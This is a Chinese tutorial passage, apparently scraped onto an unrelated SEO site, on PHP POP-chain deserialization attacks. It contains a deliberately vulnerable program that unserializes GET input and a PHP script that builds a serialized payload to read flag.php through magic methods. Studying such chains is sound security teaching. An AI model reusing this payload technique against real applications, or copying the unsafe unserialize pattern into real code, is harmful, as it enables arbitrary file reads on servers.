当前位置: 首页 > news >正文

微信怎么做一些微网站网络公司关键词排名

微信怎么做一些微网站,网络公司关键词排名,wordpress 主题 排行榜,iis安装wordpressPOP( Procedure Oriented Programming )链是反序列化安全问题中相对比较重要的技术点,相比于其他的反序列化问题,这种漏洞的产生更加难以发现,以及在利用上也比较复杂。 要掌握这个东西首先要先了解面向对象中的几个特…

POP( Procedure Oriented Programming )链是反序列化安全问题中相对比较重要的技术点,相比于其他的反序列化问题,这种漏洞的产生更加难以发现,以及在利用上也比较复杂。

要掌握这个东西首先要先了解面向对象中的几个特殊函数:

1. __call() 函数

当调用一个不可访问的方法时会自动调用本函数。这里的不可访问包含私有属性或未定义。

2. __get() 函数

当调用一个不可访问的属性的时候会自动调用本函数。这里的不可访问包含私有属性或未定义。

3. __set() 函数

当给不可访问的属性进行赋值的时候会自动运行本函数。

4. __toString() 函数

当将当前对象以字符串的形式进行输出时会执行这个函数中的代码。

5. __destruct() 函数

当对象操作执行完毕后自动执行__destruct()函数的代码。

6. __wakeup() 函数

在进行反序列化的时候会优先调用本函数。

7. __construct() 函数

初始化函数又叫构造函数,用来在创建对象的时候进行一些初始化操作,如执行函数、初始化变量。

这里我用一个网上的程序来讲一下,因为这个例子比较简单,适合刚接触的同学研究。过段时间会拿一个赛题来具体讲一下。

class C1e4r{
public $test;
public $str;
public function __construct($name)
{
$this->str = $name;
}
public function __destruct()
{
$this->test = $this->str;
echo $this->test;
}
}class Show{
public $source;
public $str;
public function __construct($file)
{
$this->source = $file;
echo $this->source;
}
public function __toString()
{
$content = $this->str['str']->source;
return $content;
}
public function __set($key,$value)
{
$this->$key = $value;
}
public function _show()
{
if(preg_match('/http|https|file:|gopher|dict|..|f1ag/i',$this->source)) {
die('hacker!');
} else {
highlight_file($this->source);
}
}
public function __wakeup()
{
if(preg_match("/http|https|file:|gopher|dict|../i", $this->source)) {
echo "hacker~";
$this->source = "index.php";
}
}
}class Test{
public $file;
public $params;
public function __construct()
{
$this->params = array();
}

public function __get($key)

{

return $this->get($key);

}

public function get($key)

{

if(isset($this->params[$key])) {

$value = $this->params[$key];

} else {

$value = "index.php";

}

return $this->file_get($value);

}

public function file_get($value)

{

$text = base64_encode(file_get_contents($value));

return $text;

}

}

$name=unserialize($_GET[strs]);

POP链的主要内容就是对象中的各个函数间的调用关系链,将每个函数的调用关系拼接起来就是我们的 POP 链。

那么根据这个思维来看上面的程序,我们首先确定好要调用Test类中的 file_get 方法来读取文件内容,为此我们需要使用 Test 类中的 get 方法来调用 file_get 方法,接下来发现 Test 类中的 __get 方法可以调用 get 方法从而调用 file_get 来读取文件。

那么现在的POP链就是:

Test::__get()->Test::get()->Test::get_file()

下面继续寻找能够触发__get()方法的途径。在 Show 类中看见有个 __toString 方法,其中能够调用一个属性进行赋值操作,这里可以触发 __get 方法,所以这里需要将创建的 Test 对象赋值给 $this->str['str'] ,那么如何去触发 __toString 方法?这里可以通过 C1e4r 类中的 __destruct 进行触发。

那么现在的POP链就很明了了 , 这里给的是逆向关系链。

((Test::__get()->Test::get()->Test::get_file())->Show::str[‘str’])->C1e4r::str

接下来构造利用脚本

<?php
class C1e4r{
public $test;
public $str;
public function __construct($name){
$this->str = $name;
}
public function __destruct()
{
$this->test = $this->str;
echo $this->test;
}
}
class Show{
public $str;
public $source;
public function __toString()
{
$content = $this->str['str']->source;
return $content;
}
}
class Test{
public $file;
public $params;
}
$T=new Test();
$T->params=array('source'=>'flag.php');
$S=new Show();
$S->str=array('str'=>$T);
$C=new C1e4r($S);
echo serialize($C);
?>
http://www.mmbaike.com/news/101816.html

相关文章:

  • 邢台建网站的公司技术培训学校机构
  • 达州网站建设公司推广代运营公司
  • 网站设计培训成都深圳网络推广营销公司
  • 有哪些学做衣服的网站弹窗广告最多的网站
  • 培训机构暑假不能补课win7优化大师官方网站
  • 网站建设客户相关问题网络竞价推广开户
  • 美橙网站设计互联网营销专业
  • 专业网站开发开发关键词语有哪些
  • 肇庆网站建设方案外包网络营销策划方案论文
  • 现在1做啥网站流量大网站域名在哪买
  • VPS做镜像网站google关键词搜索量
  • 品网站建设公司金华百度seo
  • 广州的一起做网站怎么样增加百度指数的四种方法
  • 奶茶培训网站建设国内哪个搜索引擎最好用
  • wordpress 做wiki南京seo收费
  • 建设网站要注意事项建立网站用什么软件
  • 企业快速建站免费模板天津外贸seo推广
  • 自己做APP需要网站吗seo搜索推广
  • 巨鹿县住房与城乡建设厅网站中国国家培训网官网
  • 鄂州网站设计公司短视频营销推广方案
  • 免费自己做网站手机软件全国各城市疫情高峰感染进度
  • 三五互联网站建设垃圾seo技术培训茂名
  • jsp网站制作详细教程湖南长沙今日疫情
  • 网上商城网站开发与建立的意义竞价推广代运营
  • 给自己公司做网站运营长沙百度快速排名优化
  • 网站开发工程师的职责app推广赚佣金
  • 广州做动态网站的公司seoul什么意思
  • 网站开发技术总监面试题百度网盘网页版登录首页
  • 经纪人做网站技巧四川企业seo
  • led视频网站建设济南市新闻最新消息